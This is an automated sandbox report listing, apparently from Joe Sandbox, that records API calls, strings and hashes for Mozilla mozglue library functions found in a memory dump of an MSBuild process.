                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B85
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: EnterCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B90
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: LeaveCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5BD8
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: GetTickCount64.KERNEL32 ref: 6C8A5BE4
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C8CF0AC
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C8CF0BE
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: __aulldiv.LIBCMT ref: 6C8A5DB4
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A5DED
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8CF155
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF1E0
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF1ED
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF212
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF229
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF231
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF248
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF2AE
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF2BB
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF2F8
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF350
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF35D
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF381
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF398
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF3A0
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF489
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF491
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF3CF
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: GetCurrentThreadId.KERNEL32 ref: 6C8CF440
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF44D
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF472
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF4A8
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF559
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF561
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF577
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF585
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF5A3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6C8CF3A8
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6C8CF499
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6C8CF239
                                                                                                                                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C8CF56A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C8964DF
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C8964F2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C896505
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C896518
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C89652B
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C89671C
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C896724
                                                                                                                                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C89672F
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C896759
                                                                                                                                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C896764
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C896A80
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C896ABE
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C896AD3
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C896AE8
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C896AF7
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen
                                                                                                                                                                                                                      • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD4F2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD50B
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: EnterCriticalSection.KERNEL32(6C90E784), ref: 6C88CFF6
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C88D026
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD52E
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8AD690
                                                                                                                                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8AD6A6
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8AD712
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD751
                                                                                                                                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8AD7EA
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                      • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 6C8E4EFF
                                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8E4F2E
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6C8E4F52
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000), ref: 6C8E4F62
                                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8E52B2
                                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8E52E6
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000010), ref: 6C8E5481
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8E5498
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744), ref: 6C897885
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744), ref: 6C8978A5
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C8978AD
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C8978CD
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8978D4
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C8978E9
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C89795D
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C8979BB
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C897BBC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C897C82
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C897CD2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C897DAF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 759993129-0
                                                                                                                                                                                                                      • Opcode ID: 380cc3dfcf793c56bdc2be36528ce9aa628f855429f11f0dc0d9f16cb7da7572
                                                                                                                                                                                                                      • Instruction ID: 622502c135d052e98cbfb629c5ba77214378c4dcd18ddc566db13c89845e11fe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 380cc3dfcf793c56bdc2be36528ce9aa628f855429f11f0dc0d9f16cb7da7572
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2027371A0521A8FDB64CF19C984799B7B5FF88318F2586AAD809A7711D730FE90CF80
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C51DF
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C529C
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C8C52FF
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C536D
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C53F7
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C8C56C3
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8C56E0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C8C56BE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                                                                                                                                                      • API String ID: 1227157289-345010206
                                                                                                                                                                                                                      • Opcode ID: 00be8f4dda72950ef29d38d3a6f0fd98096361caa8a53b8c1ad4dc18a7104b28
                                                                                                                                                                                                                      • Instruction ID: 8c4fdbacbc1ad1ff07965dea202a74491faf4a74fcb5b4205eeafa8fcae13e39
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00be8f4dda72950ef29d38d3a6f0fd98096361caa8a53b8c1ad4dc18a7104b28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64E17171A14F45CAC722CF38C850267B7B9BF9B394F109F1EE8AA2A950DF70D4469742
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C8E7046
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C8E7060
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8E707E
                                                                                                                                                                                                                        • Part of subcall function 6C8981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8981DE
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8E7096
                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E709C
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 6C8E70AA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                                                                      • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                                                                      • API String ID: 2989430195-1695379354
                                                                                                                                                                                                                      • Opcode ID: 7a5d5c4d5f2080542abf9f5c56f45316f103d136c8d89d1227772a40e47f5bf1
                                                                                                                                                                                                                      • Instruction ID: 99ca5afdd17908c3580c285c2073ccda6bc9d7311015ee2850beac3d38905ee3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a5d5c4d5f2080542abf9f5c56f45316f103d136c8d89d1227772a40e47f5bf1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA01B9B1B04108AFDB006BA8DC4ADAF7BBCEF49255F11043DFA05E3241D771A9148BE1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C8D2C31
                                                                                                                                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C8D2C61
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C884E5A
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C884E97
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8D2C82
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8D2E2D
                                                                                                                                                                                                                        • Part of subcall function 6C8981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8981DE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                      • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                      • API String ID: 801438305-4149320968
                                                                                                                                                                                                                      • Opcode ID: 490e397295cfb5ee188442ccbaa533f01b8cec01110b7dfde6c4d7dd5b9f4583
                                                                                                                                                                                                                      • Instruction ID: 2060bf044fb14039d59f6e1639aa082520ada22d9e689ac7f9353223e9a1e1aa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 490e397295cfb5ee188442ccbaa533f01b8cec01110b7dfde6c4d7dd5b9f4583
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4491CC706087848FD734CF28C58469EB7F0AFC9258F114E2DE99A8B750DB34E94ACB52
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                      • String ID: -Infinity$NaN
                                                                                                                                                                                                                      • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                      • Opcode ID: 9c9b6942ab7ed5aa88d5caaaddce4d14152b0c1a11943432e5d1cc07ee0f99e8
                                                                                                                                                                                                                      • Instruction ID: 23be9340f05e858dd56d3822b3ad4f2a1f7e56239015364faa68216234680e44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c9b6942ab7ed5aa88d5caaaddce4d14152b0c1a11943432e5d1cc07ee0f99e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFC1A331E04319DBDB24CF9CC9907EEBBB6AF89B14F14492DD406ABB80D770A945CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C899B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C8EB92D), ref: 6C899BC8
                                                                                                                                                                                                                        • Part of subcall function 6C899B80: __Init_thread_footer.LIBCMT ref: 6C899BDB
                                                                                                                                                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C8903D4,?), ref: 6C8EB955
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EB9A5
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EBA20
                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C8EBA7B
                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C8EBA81
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C8EBA86
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1753913139-0
                                                                                                                                                                                                                      • Opcode ID: 9f7319e3429a25addb5acc81d6ea80b10bda0ead04be705d96dacef86afd64a5
                                                                                                                                                                                                                      • Instruction ID: b2d5f260dda9bbd706263f8f25784578626497ef2a947af96151c14f26eb7767
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7319e3429a25addb5acc81d6ea80b10bda0ead04be705d96dacef86afd64a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25517D71E02229DFDF24CEA8DA84AEDB7B6AF8D314F144539E901B7704DB30AD458B94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: GetCurrentThreadId.KERNEL32 ref: 6C8BFA8D
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: AcquireSRWLockExclusive.KERNEL32(6C90F448), ref: 6C8BFA99
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8BD5
